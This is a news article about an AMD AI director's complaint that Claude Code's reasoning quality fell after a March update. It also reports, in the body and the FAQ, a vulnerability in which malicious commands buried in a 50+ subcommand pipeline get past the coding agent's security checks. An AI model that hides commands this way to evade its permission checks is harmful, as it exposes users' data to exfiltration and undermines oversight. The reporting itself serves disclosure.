AMD AI Director Blasts 'Dumber' Claude Code

AMD AI Director Blasts 'Dumber' Claude Code

Key Takeaways

  1. 1AMD's AI engineering team permanently abandons Claude Code following a severe drop in reasoning quality.
  2. 2Internal data shows 'laziness' violations spiking to 10 per day and pre-edit code reads plummeting 70%.
  3. 3The performance collapse directly traces back to the 2.1.69 update, which forcibly hides the AI's internal reasoning checks.
  4. 4A newly discovered 50-step bypass vulnerability completely shatters Claude Code's security perimeter, enabling data exfiltration.

Anthropic's Claude Code—once the undisputed heavyweight champion of AI coding assistants—is facing a severe crisis of confidence. According to a report by The Register, an official GitHub issue opened by AMD's AI group director outlines a steep, sudden drop in reasoning quality and reliability.

The degradation has become so pronounced that AMD's AI engineering team has officially abandoned the tool and switched providers. For a platform that largely built its reputation on complex engineering tasks, this erosion of enterprise trust raises critical questions about Anthropic's future trajectory.

The Data: Why Claude Got "Lazier"

Stella Laurenzo, director of AMD's AI group, brought receipts. In a detailed complaint on GitHub and a subsequent LinkedIn post, she concluded that Claude Code "cannot be trusted to perform complex engineering tasks" after months of heavy, consistent enterprise use.

Her team didn't just guess—they analyzed 6,852 Claude Code sessions containing over 234,000 tool calls and nearly 18,000 thinking blocks. The resulting trends are alarming:

    • Spiking "Laziness": "Stop-hook violations"—where the AI prematurely quits thinking or avoids complex work—went from zero before March 8th to 10 violations per day by late March.
    • Plummeting Code Engagement: The average number of times Claude would cross-reference code before making changes plummeted from 6.6 reads down to just 2.
    • Reckless Edits: Rather than making precise, targeted edits, the AI began lazily rewriting entire files from scratch.
Laurenzo directly blames the rollout of Claude Code version 2.1.69 in early March. The update introduced "thinking content redaction," which strips the AI's internal thought process from API responses by default—leaving users entirely blind to its reasoning.

Security Flaws and the "Dumbing Down" Effect

The reasoning collapse isn't Anthropic's only headache. Users had already started raising red flags in February, when a previous update intentionally truncated how the AI explained its reading process—sparking early fears that the model was being rapidly "dumbed down" for cost efficiency.

If performance hits weren't enough, Anthropic has also faced fierce criticism over inexplicably massive token surges that have locked users out of the product entirely. And on top of it all, Claude Code recently suffered a source code leak.

Security firm Adversa AI immediately discovered a critical vulnerability following the leak. Attackers can completely bypass security checks if malicious commands are buried inside a 50+ subcommand pipeline, exposing users to unauthorized data exfiltration.

"Such leaks allow adversaries to build lookalikes that silently install malware or harvest credentials."
Melissa Bischoping, Senior Director of Security Research at Tanium

Laurenzo ultimately urged Anthropic to prioritize transparency and introduce a "max thinking tier," insisting enterprise engineers will gladly pay a premium for guaranteed deep reasoning. While her team has completely jumped ship to another provider, she left Anthropic with a stark warning: six months ago, Claude stood completely uncontested in reasoning quality. Today, they are actively handing their crown to the competition.

FAQ

Claude Code's performance significantly degraded since early March, particularly after version 2.1.69. It now exhibits increased 'laziness' (stop-hook violations), reduced engagement with code, and a tendency to rewrite entire files instead of making targeted edits. This makes it unreliable for complex engineering tasks.

Stella Laurenzo, the director of the AI group at AMD, initiated the complaint on GitHub and LinkedIn. Her team's analysis of thousands of Claude Code sessions confirmed a steep decline in reasoning quality and reliability.

The degradation is attributed to the early March deployment of Claude Code version 2.1.69, which introduced 'thinking content redaction.' This feature strips the AI's internal thought process from API responses, making its reasoning opaque to users.

Yes, following a source code leak, Adversa AI discovered a critical vulnerability. This flaw allows malicious commands to bypass security checks within a 50+ subcommand pipeline, potentially leading to unauthorized data exfiltration.

Related Articles

More insights on trending topics and technology

Newsletter

Stay informed without the noise.

Daily AI updates for builders. No clickbait. Just what matters.